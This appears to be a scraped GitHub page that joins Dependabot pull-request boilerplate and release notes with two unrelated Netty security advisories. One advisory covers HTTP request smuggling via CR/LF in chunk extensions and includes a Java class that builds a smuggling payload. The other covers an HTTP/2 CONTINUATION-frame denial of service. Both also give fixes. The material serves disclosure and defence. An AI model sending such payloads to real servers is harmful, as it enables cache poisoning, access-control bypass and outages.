Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.
Dependabot commands and options
You can trigger Dependabot actions by commenting on this PR:
@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
CR (%x0D) and LF (%x0A) bytes fall outside all of these ranges and are therefore not permitted inside chunk extensions—whether quoted or unquoted. A strictly compliant parser should reject any request containing CR or LF bytes before the actual line terminator within a chunk extension with a 400 Bad Request response (as Squid does, for example).
Vulnerability
Netty terminates chunk header parsing at \r\n inside quoted strings instead of rejecting the request as malformed. This creates a parsing differential between Netty and RFC-compliant parsers, which can be exploited for request smuggling.
Expected behavior (RFC-compliant):
A request containing CR/LF bytes within a chunk extension value should be rejected outright as invalid.
Actual behavior (Netty):
Chunk:  1;a="value\r\n
                  ^^^^ parsing terminates here at \r\n (INCORRECT)
Body:   here"... is treated as body data or as the beginning of a subsequent request
The root cause is that Netty does not validate that CR/LF bytes are forbidden inside chunk extensions before the terminating CRLF. Rather than attempting to parse through quoted strings, the appropriate fix is to reject such requests entirely.
Result: The server returns two HTTP responses from a single TCP connection, confirming request smuggling.
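For illustration, the parsing differential can be reproduced with a raw payload along the following lines. This is a minimal sketch, not the PoC from the attached archive; the host name is a placeholder. An RFC-compliant parser rejects the request at the CR inside the quoted extension value, while a parser that stops at the first \r\n sees a 1-byte chunk body ("X") followed by a second request:

```java
public class SmugglingPayload {
    // Builds a chunked request whose chunk extension contains a bare CR/LF
    // inside a quoted string. A strict parser answers 400 Bad Request; a
    // parser that terminates the chunk header at the first \r\n instead
    // sees two requests on one connection.
    static String build() {
        return "POST / HTTP/1.1\r\n"
             + "Host: example.test\r\n"        // placeholder host
             + "Transfer-Encoding: chunked\r\n"
             + "\r\n"
             + "1;a=\"value\r\n"               // CR/LF inside a quoted extension value
             + "X\r\n"                         // 1-byte chunk body as seen by the lenient parser
             + "0\r\n\r\n"                     // terminal chunk
             + "GET /smuggled HTTP/1.1\r\n"    // parsed as a second request
             + "Host: example.test\r\n"
             + "\r\n";
    }

    public static void main(String[] args) {
        System.out.print(build());
    }
}
```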
Parsing Breakdown
Parser               | Request 1       | Request 2
---------------------|-----------------|------------------------------------
Netty (vulnerable)   | POST / body="X" | GET /smuggled (SMUGGLED)
RFC-compliant parser | 400 Bad Request | (none — malformed request rejected)
Impact
Request Smuggling: An attacker can inject arbitrary HTTP requests into a connection.
Cache Poisoning: Smuggled responses may poison shared caches.
Access Control Bypass: Smuggled requests can circumvent frontend security controls.
Session Hijacking: Smuggled requests may intercept responses intended for other users.
Reproduction
Start the minimal proof-of-concept environment using the provided Docker configuration.
Execute the proof-of-concept script included in the attached archive.
Suggested Fix
The parser should reject requests containing CR or LF bytes within chunk extensions rather than attempting to interpret them:
1. Read chunk-size.
2. If ';' is encountered, begin parsing extensions:
a. For each byte before the terminating CRLF:
- If CR (%x0D) or LF (%x0A) is encountered outside the
final terminating CRLF, reject the request with 400 Bad Request.
b. If the extension value begins with DQUOTE, validate that all
enclosed bytes conform to the qdtext / quoted-pair grammar.
3. Only treat CRLF as the chunk header terminator when it appears
outside any quoted-string context and contains no preceding
illegal bytes.
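The rejection logic above can be sketched as a stand-alone validator. All names here are illustrative, not Netty's actual API; the method receives the bytes between ';' and the terminating CRLF (terminator excluded) and refuses any embedded CR/LF:

```java
public class ChunkExtensionValidator {
    // Returns true only if the chunk-extension bytes contain no CR/LF and
    // every quoted-string is properly closed. A real parser would reject
    // the request with 400 Bad Request when this returns false.
    static boolean isValidExtension(String ext) {
        boolean inQuotes = false;
        for (int i = 0; i < ext.length(); i++) {
            char c = ext.charAt(i);
            if (c == '\r' || c == '\n') {
                return false; // CR/LF is illegal anywhere inside an extension
            }
            if (inQuotes && c == '\\' && i + 1 < ext.length()) {
                i++; // quoted-pair: skip the escaped byte
                continue;
            }
            if (c == '"') {
                inQuotes = !inQuotes; // enter/leave quoted-string context
            }
        }
        return !inQuotes; // an unterminated quoted-string is also malformed
    }

    public static void main(String[] args) {
        System.out.println(isValidExtension("a=\"value\""));
        System.out.println(isValidExtension("a=\"value\rhere\""));
    }
}
```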
Acknowledgments
Credit to Ben Kallus for clarifying the RFC interpretation during discussion on the HAProxy mailing list.
A remote user can trigger a Denial of Service (DoS) against a Netty HTTP/2 server by sending a flood of CONTINUATION frames. Because the server places no limit on the number of CONTINUATION frames, and its existing size-based mitigation can be bypassed with zero-byte frames, a user can cause excessive CPU consumption with minimal bandwidth, rendering the server unresponsive.
Details
The vulnerability exists in Netty's DefaultHttp2FrameReader. When an HTTP/2 HEADERS frame is received without the END_HEADERS flag, the server expects one or more subsequent CONTINUATION frames. However, the implementation does not enforce a limit on the count of these CONTINUATION frames.
The key issue is located in codec-http2/src/main/java/io/netty/handler/codec/http2/DefaultHttp2FrameReader.java. The verifyContinuationFrame() method checks for stream association but fails to implement a frame count limit.
Any user can exploit this by sending a stream of CONTINUATION frames with a zero-byte payload. While Netty has a maxHeaderListSize protection to limit the total size of headers, this check is never triggered by zero-byte frames. The logic effectively evaluates to maxHeaderListSize - 0 < currentSize, which will not trigger the limit until a non-zero byte is added. As a result, the server is forced to process an unlimited number of frames, consuming a CPU thread and monopolizing the connection.
verifyContinuationFrame() (lines 381-393) — No frame count check:
private void verifyContinuationFrame() throws Http2Exception {
    verifyAssociatedWithAStream();
    if (headersContinuation == null) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    if (streamId != headersContinuation.getStreamId()) {
        throw connectionError(PROTOCOL_ERROR, "...");
    }
    // NO frame count limit!
}
HeadersBlockBuilder.addFragment() (lines 695-723) — Byte limit bypassed by 0-byte frames:
// Lines 710-711: this check NEVER fires when len = 0
if (headersDecoder.configuration().maxHeaderListSizeGoAway() - len <
        headerBlock.readableBytes()) {
    headerSizeExceeded(); // 10240 - 0 < 1 => FALSE always
}
When len=0: maxGoAway - 0 < readableBytes → 10240 < 1 → FALSE. The byte limit is never triggered.
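The bypass arithmetic can be checked directly. This sketch mirrors the shape of the size check above; the constant 10240 is the example limit from the snippet, not a Netty default:

```java
public class ZeroByteBypass {
    // Mirrors the addFragment() size check: it fires only when
    // (maxGoAway - len) < alreadyBuffered.
    static boolean limitFires(long maxGoAway, int len, int alreadyBuffered) {
        return maxGoAway - len < alreadyBuffered;
    }

    public static void main(String[] args) {
        // Zero-byte CONTINUATION frames never move the total toward the
        // limit, so the check stays false however many frames arrive.
        System.out.println(limitFires(10240, 0, 1));     // bypassed
        System.out.println(limitFires(10240, 10300, 1)); // a large fragment trips it
    }
}
```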
Impact
This is a CPU-based Denial of Service (DoS). Any service using Netty's default HTTP/2 server implementation is impacted. An unauthenticated user can exhaust server CPU resources and block legitimate users, leading to service unavailability. The low bandwidth requirement for the attack makes it highly practical.
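One possible mitigation, sketched here as a stand-alone class: count CONTINUATION frames per header block and fail the connection once a cap is exceeded. The cap of 32 frames and every name below are assumptions for illustration, not part of Netty; a real fix inside DefaultHttp2FrameReader would raise a connection error (e.g. ENHANCE_YOUR_CALM) instead of returning a boolean:

```java
public class ContinuationLimiter {
    static final int MAX_CONTINUATION_FRAMES = 32; // assumed cap, not a Netty constant

    private int continuationFrames;

    // Returns false once the per-header-block CONTINUATION budget is
    // exhausted; the caller would then tear down the connection.
    boolean onContinuationFrame() {
        return ++continuationFrames <= MAX_CONTINUATION_FRAMES;
    }

    // Reset the budget when a frame with END_HEADERS completes the block.
    void onHeaderBlockEnd() {
        continuationFrames = 0;
    }

    public static void main(String[] args) {
        ContinuationLimiter limiter = new ContinuationLimiter();
        boolean ok = true;
        for (int i = 0; i < 1000 && ok; i++) {
            ok = limiter.onContinuationFrame();
        }
        System.out.println(ok); // flood detected long before 1000 frames
    }
}
```

Because the counter is per header block, legitimate clients that split large headers across a handful of CONTINUATION frames are unaffected.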
dependabot[bot] deleted the dependabot/github_actions/aws-actions/aws-secretsmanager-get-secrets-3.0.0 branch on April 6, 2026 at 10:14.
Bumps aws-actions/aws-secretsmanager-get-secrets from 2.0.10 to 3.0.0.
Release notes
Sourced from aws-actions/aws-secretsmanager-get-secrets's releases.
Commits
3a411b6 Bump version from 2.0.11 to 3.0.0 (#297)
07435e3 Remove actions/github, update actions/core (#299)
bed0d09 Update dependencies (#298)
ca8dc62 chore: Bump flatted from 3.3.3 to 3.4.2 (#295)
9c2003c Update dependencies (#292)
8d2df8d Add versioned user-agent to AWS API calls (#272)
aa511bf fix: use OIDC for Codecov (#266)
3f3c975 Replace push dist/ with check dist/ (#256)